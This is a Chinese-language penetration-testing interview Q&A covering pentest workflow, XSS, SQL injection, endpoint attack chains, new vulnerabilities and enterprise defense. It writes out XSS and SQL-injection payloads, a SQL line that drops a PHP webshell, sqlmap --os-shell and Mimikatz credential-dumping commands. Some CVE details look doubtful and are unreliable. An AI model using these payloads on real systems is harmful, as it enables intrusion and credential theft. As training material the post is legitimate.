2025年渗透测试面试题总结-2025年HW(护网面试) 04(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年HW(护网面试) 04
1. 渗透测试流程
2. 渗透项目实战案例
3. XSS漏洞全景与修复
4. SQL注入攻防体系
5. 终端渗透实战经验
6. 新型漏洞风向(2024-2025)
7. 企业内部安全架构
2025年HW(护网面试) 04
1、渗透测试流程 2、描述渗透项目,做了什么 3、xss漏洞类型、详情、修复方案 4、SQL注入原理、类型,waf绕过,写shell,提权,修复方案 5、终端的渗透经验 6、了解什么比较新的漏洞 7、企业内部安全
1. 渗透测试流程
采用PTES标准七阶段模型:
- 情报收集
- 主动扫描:
Nmap
探测端口,Sublist3r
搜集子域名- 被动情报:
Shodan
/Censys
搜索暴露资产,Wayback Machine
历史快照- 威胁建模
- 绘制攻击面图(如
OWASP Threat Dragon
)- 确定高危组件(如暴露的Jenkins、未鉴权的Kibana)
- 漏洞分析
- 自动化扫描:
Burp Suite
+Nessus
组合扫描- 手工验证:业务逻辑漏洞(如越权访问ID可遍历)
- 渗透利用
- 武器化漏洞:
Metasploit
模块开发或Cobalt Strike
载荷投递- 后渗透阶段
- 横向移动:
Mimikatz
抓取凭证,BloodHound
分析域控路径- 权限维持:影子账户/计划任务/服务持久化
- 报告编制
- 风险量化:DREAD模型评分(0-10分制)
- PoC视频:关键漏洞操作录屏
- 复测验收
- 验证修复方案有效性(如WAF规则是否可绕过)
2. 渗透项目实战案例
项目背景:某金融平台授权渗透(范围:Web+内网)
关键成果:
- 阶段1:Web层突破
- 发现订单ID反射型XSS → 组合CSRF修改管理员邮箱(无Token防护)
- SQL注入利用:
sqlmap -u "id=1*" --os-shell
→ 获取Webshell- 阶段2:内网横向
- 破解Jenkins部署服务器 → 获取Gitlab凭据 → 下载源码库
- 利用Ansible未授权访问 → 批量操控Linux服务器(写入SSH后门)
- 阶段3:域控提权
- 通过SMB漏洞(CVE-2023-23397)获取域用户 →
Kerberoasting
攻击获取域管权限
最终报告:提交27个高危漏洞,协助建立SDLC安全流程
3. XSS漏洞全景与修复
类型 攻击示例 修复方案 反射型 http://site.com?search=<script>alert(1)</script>
输出编码: Html.Encode(userInput)
存储型 评论区插入 <img src=x onerror=stealCookie()>
富文本过滤: DOMPurify.sanitize(html)
DOM型 eval(location.hash.slice(1))
避免危险API:用 textContent
替代innerHTML
深度防御:
- CSP策略:
Content-Security-Policy: default-src 'self'; script-src 'nonce-xxx'
- Cookie属性:
Set-Cookie: session=xxx; HttpOnly; SameSite=Lax
4. SQL注入攻防体系
攻击原理:用户输入拼接SQL语句 → 恶意构造语法改变查询逻辑
攻击类型:
- 联合查询:
' UNION SELECT @@version, null-- -
- 布尔盲注:
' AND (SELECT SUBSTRING(password,1,1) FROM users)='a'-- -
- 时间盲注:
' AND IF(1=1,SLEEP(5),0)-- -
WAF绕过技术:- 分块传输:
Transfer-Encoding: chunked
绕过关键词检测- 注释混淆:
SEL/**/ECT
或 Unicode编码:U&'\0073\0065\006c\0065\0063\0074'
写Webshell方法:sql
SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'
提权路径:
- 数据库高权限账号 → 执行系统命令(如
xp_cmdshell
)- 利用SUID程序漏洞:
find / -perm -4000 2>/dev/null
- 内核提权:
searchsploit Linux 5.4
→ 编译EXP
根治方案:
- 预编译语句:
PreparedStatement
(Java/PHP PDO)- 最小权限:数据库账号禁用
FILE
/EXECUTE
权限
5. 终端渗透实战经验
攻击链路径:
mermaid
graph LR A[钓鱼邮件] --> B[宏病毒释放Cobalt Strike] B --> C[绕过EDR:内存加密加载Shellcode] C --> D[横向移动:PsExec+WMI远程执行] D --> E[数据窃取:Rclone加密传输至云存储]
关键技术:
- 凭证获取:
- Windows:
Mimikatz sekurlsa::logonpasswords
- Linux:dump
/etc/shadow
+John the Ripper
破解- 权限维持:
- Windows:注册表
HKLM\...\Run
键 + 隐藏服务- Linux:
crontab
定时反向Shell + 隐藏进程(libprocesshider
)
6. 新型漏洞风向(2024-2025)
- AI供应链攻击
- 模型投毒:污染训练数据导致输出偏差(如Hugging Face库漏洞)
- 云原生逃逸
- Kubernetes CVE-2024-21624:容器逃逸获取宿主机权限
- 协议级漏洞
- TCP协议:基于侧信道的QUIC协议数据泄漏(CVE-2024-31086)
- 硬件层攻击
- Intel TDX虚拟机逃逸(CVE-2025-xxxx)
7. 企业内部安全架构
纵深防御体系:
层 技术方案 工具示例 边界防护 零信任网络(ZTNA)替代VPN Cloudflare Access
终端安全 EDR+内存行为检测 CrowdStrike Falcon
数据安全 全盘加密+DLP敏感内容识别 Microsoft Purview
审计响应 SIEM集中日志分析 Elastic Security
核心策略:
- 红蓝对抗:季度攻防演练(Purple Team)
- ATT&CK覆盖:基于MITRE框架检测能力映射
- 自动化响应:SOAR平台集成(如
TheHive
+Cortex
)